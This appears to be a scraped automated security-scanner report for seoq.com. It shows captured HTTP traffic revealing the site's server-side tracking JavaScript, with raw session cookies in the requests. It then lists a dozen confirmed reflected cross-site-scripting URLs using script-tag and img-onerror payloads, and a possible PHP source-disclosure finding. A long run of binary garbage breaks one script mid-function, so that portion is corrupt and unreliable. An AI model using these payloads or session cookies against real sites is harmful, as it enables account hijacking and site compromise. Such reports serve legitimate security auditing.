nodes = baseDocument.getElementsByTagName('form');

for(var index = 0; index < nodes.length; index++) {
chainOnSubmit(nodes[index]);
}

// - AREA tags (for image maps)
nodes = baseDocument.getElementsByTagName('area');

for(var index = 0; index < nodes.length; index++) {
chainOnClick(nodes[index]);
}

// - Digg proxy handling
// 2008-01-08 Note: Verified that IE reaches this point
/* nodes = baseDocument.getElementsByName('blvdDiggProxy'); */

// 2008-01-08: IE handles getElementsByName differently
// from Firefox. IE will return only tags with the NAME
// attribute set (actually according to spec). So for now
// we spoof the process for DIVs, SPANs, and Ps

var possibleDiggs = new Array();

nodes = baseDocument.getElementsByTagName('div');
for(var index = 0; index < nodes.length; index++) possibleDiggs.push(nodes[index]);

nodes = baseDocument.getElementsByTagName('span');
for(var index = 0; index < nodes.length; index++) possibleDiggs.push(nodes[index]);

nodes = baseDocument.getElementsByTagName('p');
for(var index = 0; index < nodes.length; index++) possibleDiggs.push(nodes[index]);

nodes = new Array();
for(var index = 0; index < possibleDiggs.length; index++) {
node = possibleDiggs[index];

if (node.getAttribute == 'undefined') continue;

if (node.getAttribute('name') == 'blvdDiggProxy') {
nodes.push(node);
}
}

for(var index = 0; index < nodes.length; index++) {
node = nodes[index];

// Check for any recognized digg_* attributes on the node
var attributeName;
var extraParameters = '';
var compact = false;
var url = document.location;

for(var i = 0; i < node.attributes.length; i++) {
attributeName = node.attributes[i].name;

if (attributeName.indexOf('digg_') != 0) continue;

if (attributeName == 'digg_skin' && node.attributes[i].value == 'compact') {
compact = true;
}

if (attributeName == 'digg_url') {
url = node.attributes[i].value;

// URL settings don't need to be added as extra parameters
continue;
}

extraParameters += "&" + attributeName + "=" + URLEncode(node.attributes[i].value);
}

// Replace the proxy element with an IFRAME containing
// the Digg proxy
var iframe = document.createElement("iframe");

iframe.src = "<?php echo URL_BLVD_BASE; ?>proxy/digg.php" +
"?s=" + currentSessionId +
"&u=" + URLEncode(url) +
extraParameters
;
iframe.scrolling = "no";
iframe.setAttribute("frameBorder", "0");
iframe.setAttribute("border", "0");
iframe.frameborder = 0;

if (compact) {
iframe.width = "120";
iframe.height = "18"
} else {
iframe.width = "52";
iframe.height = "80"
}

nodes[index].appendChild(iframe);
}
}

// - RSS alternate link tags
var node;
var typeValue;
var nodes;
nodes = document.getElementsByTagName('link');

for(var index = 0; index < nodes.length; index++) {
node = nodes[index];
typeValue = node.getAttribute('type');

if (typeValue == 'application/rss+xml') {
}
}

createShortTermCookie('blvdSessionId', currentSessionId, 30);
replaceLinks(document);

- /blvdstatus/js/trackingJS.php_2008_08_12_r1

/blvdstatus/js/trackingJS.php_2008_08_12_r1

http://www.seoq.com/blvdstatus/js/trackingJS.php_2008_08_12_r1

Request

GET /blvdstatus/js/trackingJS.php_2008_08_12_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:19 GMT
Server: Apache
Last-Modified: Wed, 06 Aug 2008 14:37:54 GMT
ETag: "2548030-1939-453cb848ad480"
Accept-Ranges: bytes
Content-Length: 6457
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

var currentSessionId = '<?php echo $sessionId; ?>';
var currentNavigationId = '<?php echo $navigationId; ?>'

/*
* Utility function to test if another object is actually a function.
*/
function isFunction(object) {
return (typeof(object) != 'undefined' && typeof(object) == 'function');
}

function isDefined(object) {
return (typeof(object) != 'undefined');
}

/*
* Digg friendly URLEncode function -- taken from:
* http://cass-hacks.com/articles/code/js_url_encode_decode/
* [CB] Modified to use %20 instead of + for spaces
*/
function URLEncode (clearString) {
var output = '';
var x = 0;
clearString = clearString.toString();
var regex = /(^[a-zA-Z0-9_.]*)/;
while (x < clearString.length) {
var match = regex.exec(clearString.substr(x));
if (match != null && match.length > 1 && match[1] != '') {
output += match[1];
x += match[1].length;
} else {
if (clearString[x] == ' ')
output += '%20';
else {
var charCode = clearString.charCodeAt(x);
var hexVal = charCode.toString(16);
output += '%' + ( hexVal.length < 2 ? '0' : '' ) + hexVal.toUpperCase();
}
x++;
}
}

return output;
}

function logOutgoingLink(node) {
var i = new Image();

i.src =
"<?php echo DYNAMIC_URL_BASE; ?>leave.php" +
"?url=" + URLEncode(node.href) +
"&nid=" + currentNavigationId +
"&tf=<?php echo $trackingFlags; ?>"
;
}

function logOutgoingForm(node) {
var i = new Image();

i.src =
"<?php echo DYNAMIC_URL_BASE; ?>leave.php" +
"?url=" + URLEncode(node.action) +
"&nid=" + currentNavigationId +
"&tf=<?php echo $trackingFlags; ?>"
;
}

function chainOnClick(node) {
if (isDefined(node.addEventListener)) {
node.addEventListener(
'click',
function() {
logOutgoingLink(node);
},
false
);
} else if (isDefined(node.attachEvent)) {
node.attachEvent(
'onclick',
function() {
logOutgoingLink(node);
}
);
} else {
var currentOnClick;

currentOnClick = node.onclick;

node.onclick = function() {
// Log the click
logOutgoingLink(node);

// Execute any existing on click function
if (isFunction(currentOnClick)) {
return currentOnClick();
}
}
}
}

function chainOnSubmit(node) {
if (isDefined(node.addEventListener)) {
node.addEventListener(
'submit',
function() {
logOutgoingForm(node);
},
false
);
} else if (isDefined(node.attachEvent)) {
node.attachEvent(
'onsubmit',
function() {
logOutgoingForm(node);
}
);
} else {
var currentOnSubmit;

currentOnSubmit = node.onsubmit;

node.onsubmit = function() {
// Log the click
logOutgoingForm(node);

// Execute any existing on click function
if (isFunction(currentOnSubmit)) {
return currentOnSubmit();
}
}
}
}

function replaceLinks(baseDocument) {
// Find every link:
// - A tags
var nodes = baseDocument.getElementsByTagName('a');

for(var index = 0; index < nodes.length; index++) {
chainOnClick(nodes[index]);
}

// - FORM tags (catches onSubmit event)
nodes = baseDocument.getElementsByTagName('form');

for(var index = 0; index < nodes.length; index++) {
chainOnSubmit(nodes[index]);
}

// - AREA tags (for image maps)
nodes = baseDocument.getElementsByTagName('area');

for(var index = 0; index < nodes.length; index++) {
chainOnClick(nodes[index]);
}

// - Digg proxy handling
// 2008-01-08 Note: Verified that IE reaches this point
/* nodes = baseDocument.getElementsByName('blvdDiggProxy'); */

// 2008-01-08: IE handles getElementsByName differently
// from Firefox. IE will return only tags with the NAME
// attribute set (actually according to spec). So for now
// we spoof the process for DIVs, SPANs, and Ps

var possibleDiggs = new Array();

nodes = baseDocument.getElementsByTagName('div');
for(var index = 0; index < nodes.length; index++) possibleDiggs.push(nodes[index]);

nodes = baseDocument.getElementsByTagName('span');
for(var index = 0; index < nodes.length; index++) possibleDiggs.push(nodes[index]);

nodes = baseDocument.getElementsByTagName('p');
for(var index = 0; index < nodes.length; index++) possibleDiggs.push(nodes[index]);

nodes = new Array();
for(var index = 0; index < possibleDiggs.length; index++) {
node = possibleDiggs[index];

if (node.getAttribute == 'undefined') continue;

if (node.getAttribute('name') == 'blvdDiggProxy') {
nodes.push(node);
}
}

for(var index = 0; index < nodes.length; index++) {
node = nodes[index];

// Check for any recognized digg_* attributes on the node
var attributeName;
var extraParameters = '';
var compact = false;
var url = document.location;

for(var i = 0; i < node.attributes.length; i++) {
attributeName = node.attributes[i].name;

if (attributeName.indexOf('digg_') != 0) continue;

if (attributeName == 'digg_skin' && node.attributes[i].value == 'compact') {
compact = true;
}

if (attributeName == 'digg_url') {
url = node.attributes[i].value;

// URL settings don't need to be added as extra parameters
continue;
}

extraParameters += "&" + attributeName + "=" + URLEncode(node.attributes[i].value);
}

// Replace the proxy element with an IFRAME containing
// the Digg proxy
var iframe = document.createElement("iframe");

iframe.src = "<?php echo DYNAMIC_URL_BASE; ?>proxy/digg.php" +
"?s=" + currentSessionId +
"&u=" + URLEncode(url) +
extraParameters
;
iframe.scrolling = "no";
iframe.setAttribute("frameBorder", "0");
iframe.setAttribute("border", "0");
iframe.frameborder = 0;

if (compact) {
iframe.width = "120";
iframe.height = "18"
} else {
iframe.width = "52";
iframe.height = "80"
}

nodes[index].appendChild(iframe);
}
}

// - RSS alternate link tags
var node;
var typeValue;
var nodes;
nodes = document.getElementsByTagName('link');

for(var index = 0; index < nodes.length; index++) {
node = nodes[index];
typeValue = node.getAttribute('type');

if (typeValue == 'application/rss+xml') {
}
}

createShortTermCookie('blvdSessionId', currentSessionId, 30);
replaceLinks(document);

- /blvdstatus/js/trackingJS.php_2008_08_30_r1

/blvdstatus/js/trackingJS.php_2008_08_30_r1

http://www.seoq.com/blvdstatus/js/trackingJS.php_2008_08_30_r1

Request

GET /blvdstatus/js/trackingJS.php_2008_08_30_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:19 GMT
Server: Apache
Last-Modified: Sat, 30 Aug 2008 15:13:44 GMT
ETag: "2548031-1bc2-455aed0e23a00"
Accept-Ranges: bytes
Content-Length: 7106
Keep-Alive: timeout=15, max=87
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

var currentSessionId = '<?php echo $sessionId; ?>';
var currentNavigationId = '<?php echo $navigationId; ?>'

/*
* Utility function to test if another object is actually a function.
*/
function isFunction(object) {
return (typeof(object) != 'undefined' && typeof(object) == 'function');
}

function isDefined(object) {
return (typeof(object) != 'undefined');
}

/**
*
* URL encode / decode
* http://www.webtoolkit.info/
*
* [CB] Compressed by YUI Compressor
**/
var Url={encode:function(A){return escape(this._utf8_encode(A))},decode:function(A){return this._utf8_decode(unescape(A))},_utf8_encode:function(B){B=B.replace(/\r\n/g,"\n");var A="";for(var D=0;D<B.length;D++){var C=B.charCodeAt(D);if(C<128){A+=String.fromCharCode(C)}else{if((C>127)&&(C<2048)){A+=String.fromCharCode((C>>6)|192);A+=String.fromCharCode((C&63)|128)}else{A+=String.fromCharCode((C>>12)|224);A+=String.fromCharCode(((C>>6)&63)|128);A+=String.fromCharCode((C&63)|128)}}}return A},_utf8_decode:function(A){var B="";var C=0;var D=c1=c2=0;while(C<A.length){D=A.char@0@đ�f[b�<G�h�Qctmө� fЅy��*�]qΑR�@�D��nD6��hAz)�l��\5��<��#��=�M]x��ޅXPg}S�� y�4��a�Áb��vU�ܮ6��{�l��%�%S�^�T�n EV\{DʃVm�o}�ct��ǯsQT�� u��Z\��m�hLN ϣ�{ι�Rr{-f��,T�`ڢ#=xy��/��W*��mPg�`��iط=��+��_{'U��*��N�`�7&��Hm��%�t��EI��+��;Z��^~��Y��qΧ�=�f9��JO�yP�c+D��/�,��K� Z2^��z¨��~ ��Y�h�,�gOK��5��b��MULv�W��ڕ�:�=t�v�߮f��"��Q��M��q��3�O��NW1�d��㌫�-�M� ��`r��d��j�wcT��w��ͭt�nNtCE*V��a*l��aڵ}b�RQ�@�È��(�'��[ 5F��v��M��tq�� x>�Yy�)��j&G��T�JM�[yl%2�-ݲ�D�U�-�p�6��b6�V6�D��5�.He�B��4�pQ+̋�8)�?w�T�QK�JA'~��I �-�g�Z��B��Լ��nb^��I�ڳ`��@8>��h&Ū4u�6+�|�![ɳM/W)��9��1x��¼~n��װb�ea��U��E�հm��oX��<�a�pޙ��̼i�� V??0��/Ѫg6t�C��t�RKa�M��/r6M�<}_t-��|&��LsE��0�[��3Z9� ��[ҫ�z�^BW�5+`��)=�H�"#@��>��,@pl�ݽs&5h�G�&.��R�;�y�GO�}^�,��Ԑ<ִv��>��Ͽ�ٽ��'w�s{Xl��Ǘ��u��&�� u�tH�a䮭�削 P�N�So��^�ߋ��]I,=�_q�3I �v�=ꤡa(~ly�U��kb9��ܼ��ݝ�Z,Y�\�2�A)ieߠ=GH��2K}#0P��i��v_�F�v��x�%N��I*��*�IS�I [��v�}�d�?�=�h�i+��]Z-�tQ�G��@��6�j��}�0S"��"n]�k�^�U89��\��HĴ��Κ��4��Y�پ4��a�I膫�,뵆�)J��%�x� n�1�ǧ�<�'J�C;�6ړ��)�t��>��s[ J��1QSǇ^�1dt ��if��L�{�=˫I'�E��wG��Y�7�̥��9|9|Cs`��e}G)ڪ0�{�j�U�9/e^��nOw"�lq��J3�54I� }�}L�H��5�^��sv�� 6��$��皲Z�&c&{`G��,�:�� j@�a�lW��ց��F��jq4��Yw�X�O/��Q��\r߯��{��H�:q!��c{J֔5G6�� ߚ�q�2�� ˞�©p��G��'�ܞ�Ok5l�38�}��6��C�.l��B��M5t9a)�A��$�g��!!��u0��4I�-�lnN*b3�S�_pi��^��?��2��5�Ur|ؐ(y�jE �]BL�-A)`�� Q�� -~MNՍ}6L�b�˴��ң�{yq&��Å�^��>�2$�p��$37NC�?^8ka�:$(h[C��W��5�r�RA��"�R�9�:�r9��q7[�HFT��m�w]��Dm�.�H�2�ɡ�Oc��NZ��S8%̮e��Y��n�i)�h�|��dY ��j�Iav7�}�E�{F��:ٲ��K�*ѱ�g��=m��Ny�)򞲋��#izU¹Ǐ�a�>!Hѓ��8F�IO@�^Wh��h��o�*g�ѥQO��-�h�M��G��3�է_�I��d��^p0&߯�>Eu�=�M� ��֞�+�-�TL�d�� 0��F�Ũ�FA��d�S�)�ly5��F�)�Cr?jg�֊ke�-.��fߝB�\��w�)H�G�y@�Q �ZfN�5��G�>zU��9��_�;��crX*e��H��+��K��~?��٨\ �T��C�<4qނ��3��Y��֒Fv�9|��Ց(��J'>�7�UF{Up�=�Gn��d1n�H��9Rn_�SW]��R��B��2L��k��5��X�1O��3;Ċk�D�3o�'^��H��7n��23��7��kR%��s�oO��'�F?�s��O��u$/��mbM�$�Tfi��D��j��5#/*��V -_��)�{S��->i8ss��@ )��VX�M�H��Q&f��edV�qT�]�4<��瞼j$��v�+�\z�p8'Aj6"�"��܈�1D�L?RgҸ]�UR��$��Y�, S=2^W&��>�xٟ�E��_A�>��!K��"��sv�Cs�I;��5F�w��^{��1�X�t*Sj�˦A�/̘8��+��kL�iT+󏕂��2�N�ug�4;_��&��}�4�m�WQc��T�@�^ѣ�ؿ��]a\��&Kً�gX��-v(��7 ��:cOV[��pxZ ��O��3.�`�� ٟ�[�� ꂜ��nމ��ć�z�}��#w��"�}�A��+B��aNO8��S��H�"7_��q*��*f:��dT*^[�e�ոָd�Ϟ �;@'T��ȧPX_�!RD+�?&��х��Up��-Yd-s''q�0ٶ��[�kC��+p��)�,[U��8�U��w��ʲ��e4��Jߢ�A�;��b��ܣ�Xb��a��#��#�[l� o,9>��8�9"��"M��)��ń��ɬ�K+j(?�GOO�8g%׆HT��:��H�E[�Ut�0�%c��T��d�T��T%8��+�I�fB��HY^7��Sk�yNK�@!��C¡��廿0�P ��n4~&��6e�2�|� h��T��m�R�\(*X#XP��z'�UӘ(��@�&S�.�2��q~$x0GŴ/�{��:�V�. �O~�m]mk 3��~xL��l5��'5�XO��$A4�ƪ��F� �+;*V��zf)4� ��͔�̩�B��f�I�f��V;%o�3|��sJ[��K��F#��|dDD��n*c�V�Q�t��(C�Z��$ L��Q��w�t]!��s}�)�"7w��В�z��Q��w�EͲY'� �@��J~@N�$|-�֭�-�sAe;Ra[��? �M-�׸<�.U��'ꇗ�ߌk&w��yW,r��P��>�*��o;�I��+�\��]ڳ��`�=H^`��=v6��ߍz��p��N�?d�l�&(mSv��C{m�4��F�@m��jP$#��}�#-#�Aӣ��ne26��U�q<�L��-�@b�p�*��5󦢞ǈ�2�Qt1�f$��p��`b!?�*J�� g�w؂Y ��y�5��?�h7�]F�"� �aR�bX��6�z�ýw%w�"�&?��,I�쁭��<��۰f�j��q/=�e)ԋ� ��dZ��s ��m (AUk��T��0lFb��/�/�h��-1��4�lպ��z��p�XB��ު�ۂ�� S*� 1�z�o�0��w��o� :��j*O��C��Yu�oc�Vw�u�6�c�p��k��J�0y��ւ��fx�E��Y�H��S3du��&�t��8íܨX�i��Gq��c��Y�g�⩺WKW��۫y��f�q��%�m�nl�DB�їA�(N��o��F��>��U�$��T�u�Z�*�|,�xDz��I0�B^�WFgBj�YV�E��^:\��R ��V�nʋ�f�F�~��k|�[.�E �^��ӐH��{ _+r�˖��Vt��\�a< �.K�� Ӌ�.@��/�eG�C,Z�Υ�#��(�Uoc6�-:�e��IC��(�T� [��F��໾&��{sm�P^� ��[)�Le��h=��a�]ٌ��(��z�1��l��7�4�Uo"�C|��'&��o�-AT��_@(��o�P�鶷H�0�a��w��k2��[�,�R��Hs�J�߆�/Y:�\o��NwS�7 �Ya$l�1;��w>Ԫ��-��RQF�N��G�9�8�!Pf��r7'��M�I0��<�g��7�QY��s��yv�y��.�6�J��8�5HXi�TL��K��'� yp�ǻ8ʎc$��;�nz�~�m��"��}Le�@\��5I��mv�(��b�!1 �#�q�n8)�ؗa��)�^�_S[9�V��/C�R7%r��|�L�IZ�3�j�I��?� ��N�}��~*��We^�X��6�ihvp�I{H �f��F�P/��#zIh��M]]�ŋ3�kD�Vl蕤��J�ɘ9��BT��2��A�W�՛Y�Q�/ךXr{�e��\ ��M!��-�� '��WL�[Z�0�?cޒ�M�o>'D�`��H�)��k"��u@�:W�$��ч?�b��M NP�� +^�a��}۲Pf/�5܊��sn�z� wȟ�|�=c�e0�~��a��-%�Q-� ��?ߟn�S/�ܑ;g{c5��$�J�hnV0��G�0>2fL͙� (#xu�%��[��Z��#�k[3��m� ��2�p��b��8��[��y�Q��`z+6��~oΉ'$�N��Sه��q�+��1�S#Ϗa�_��6�CM� �;��10��7:��C6^{�%z��p�I¡7��p@iD�d��r�w��L�j|v��Z�3��@Յ�Au��<� ��b9YV�|�.e�;2 ��ڄl��5��|��lP�e+��v迺�$I'��q^�®��ir�b�X��ܛ�0�2�, ��ƪV9�n��U�O��y/��9Q��pM�+[� 9Wx��?�bU��-э��Wx��~V��Rc�q��uM� 쁾�~=��{�w�Z+F#��I�J)2̿o ��ok9;��:O+qQ}9֯ Ӏܑ�#[��E �%Ǡ\Ey��*C\�[�R�q}��Y�d��ÎV��2C\Ӄ~E��xp��h��;i�QI�1��|�=?U\k(4;��K�Cs�xj2�o�?�8%��Ɓ�>p�s�DV�+�;�d��-��Y*U��cF�ac��QE��M�/ûQ�>�r_8�aT�+ �?Y%&��}A4��C.}��C�D�C��-Co��HX#��wI�ug�Jo��X�?/��ݺ�M�&m/ڜ��+>!��X+"wv�i�FbM��m=9O�V}��`5��θ*2�E�m�\��D��I_UA�U��p@�d=[�^�`��pD^pV�D�@슽��W�t꽰�C&j�X>��þ ��;L��U�T�i�[��O��I��L.\9��Ni�p�Ҟ��<�qT8;=\�VYT�B��Mz�M��b�A*�+�ƨg{�k\,��|�G��qU41vi÷�|�8��K�{�:��WR�Y�;,��6�'. r�T��>�$0I=z�3=��o��u�=�o��A�'/�O=�n��F��^%��bT�!�/;u��l��k�i{ꗨ�ܮx�4i ��ͫ�I��廰3j+�i��k��d��pO ��ow��V�5mK��ׯa�9��ʪ߆��v��2�f3m�0?[��cڷ�pk�*-��*q5V&�^�R�� +�L�)b��}ю��1�ᇶ�4�;��u�Gx݆w_N�ߪ8��.H-nC�b�n9mV�h�ﳱ#�T�zR�8@�V[��Z�s�.׺\�1��&��}V�/6�V𷍻�ټ��^^^6n��z1Ӓ)��Kk=��w��O�!��EF Y�Y�GYs�b�b�[�iÎV(�^��7|a�d�g��YE\�|�["&y��㸯D��;v ��$@ѮDS/9�8d7�JN>]z��+��d��u��qÉ��3�&�ў`�&7��^��,#pҞ4��= ��7��w'}�'xЅ5��#q'��ə'��l@��nK�z��$Ù=��%eV��+%p��5��Un�l��bZ�P{z(Eȩ�횒��{m�F��1�ׄ)-7�R�r�g��!R� ��=X,��Ww��j��%��.l}��l�� Y�B/i�:�W��r�@�2q��⁳{-Wȣ��g�x��W,�L�V]d^�,��d*�D�54R��6�a�9f%��Y�s63�y��P�r�[�Sq�y��k��-Bs��u5&1w3U�`>�ʗ�Tp��6�ɒ��E�Z��DF��^d��l>IG[�9��¶��aNѤ��׎}r \�)N��>�5o�l8��C��~��qf�� iTJI�k��d�Yv��2�/�:�Yac||,�ɐ �b��[��c��=�M��N�M�Tϕ��9�yɯ�%&��Z��FPʒZ�7�=�j�i�k�1�U@�� 2�E��v��B��j�� %�*82]�BDdT/K�n��t��Z�(|��:��BO�,vjV��F��ʌ3�;v�'��u+S �^��p![��/�>�QtZ�w<Þ��H�F�Ɵ�'�Y�K�ǕB\p��Е��Jɟ��n�;�\�KDtR��6(�6�9�v�d�[em�y�Omo��1�媗�wdoL��u+��B�rt��M��y��G�2S�� :o`�g&Ϯ^�d�Q@�p�nn3�4��ˀ. ��u�%kɸl��f�23��`�=��9��vw�p�Vs$�e[��eW,\L��W��\��ID�(��Yťb�c/� 70ȭ��j?��6D0�`j�O`��dE@jJc�{oc�DN�Q��]��1, �Rf�l�j��C_��6�CӬ}0�8��Ê��E��4�i��FU��{��4]��R4<[D��mG*\�ΚA�X��W۴Q�NF8��<�d"o�Xo�}Ć4>F��*�s.��GW�ݚ��ǲw��; ��ģ��G��|&��/��w,�VE�D�y;��Q��W7�=�۱:h��gH]�O��l�M��sS>3��#a+u�\�3`�/`��2)�z�v��巿n�L��V��m�#�"�m�_ �z�ߒ?�Z8+U�S�� Uȉ�b}��Q E�Y�p��!+�M�C�B�gĻl�Qm�|��sꨱz��c.��5v�$?��aì�As�}�^�W�B9��?'嵯G��GYA�_sKN�P��.H��e�̿2�Va�[PO��PC#^��

XSS, Cross Site Scripting in seoq.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Total Requests

Average Speed

DORK TESTS

VULNERABILITIES

VULNERABILITY SUMMARY

Cross-site Scripting

Impact

Remedy

Remedy References

External References

/quotient/2011/04/22/'%3E%3Cscript%3Ealert(9)%3C/script%3E CONFIRMED

Parameters

Request

Response

/quotient/2011/05/01/'%3E%3Cscript%3Ealert(9)%3C/script%3E CONFIRMED

Parameters

Request

Response

/quotient/2011/04/22/1798/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

Parameters

Request

Response

/quotient/2011/04/22/2272/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

Parameters

Request

Response

/quotient/2011/04/22/1797/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

Parameters

Request

Response

/quotient/2011/04/22/2270/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

Parameters

Request

Response

/quotient/2011/04/22/2271/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

Parameters

Request

Response

/quotient/2011/05/01/2841/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

Parameters

Request

Response

/quotient/2011/05/01/2840/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

Parameters

Request

Response

/quotient/2011/05/01/2838/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

Parameters

Request

Response

/quotient/2011/05/01/2839/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

Parameters

Request

Response

/quotient/2011/05/01/2837/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

Parameters

Request

Response

[Possible] PHP Source Code Disclosure

Impact

Actions to Take

Required skills for successful exploitation

External References

Request

Response

Request

Response

Request

Response

Request

Response

Request

Response

Request

Response

Request

Response

Request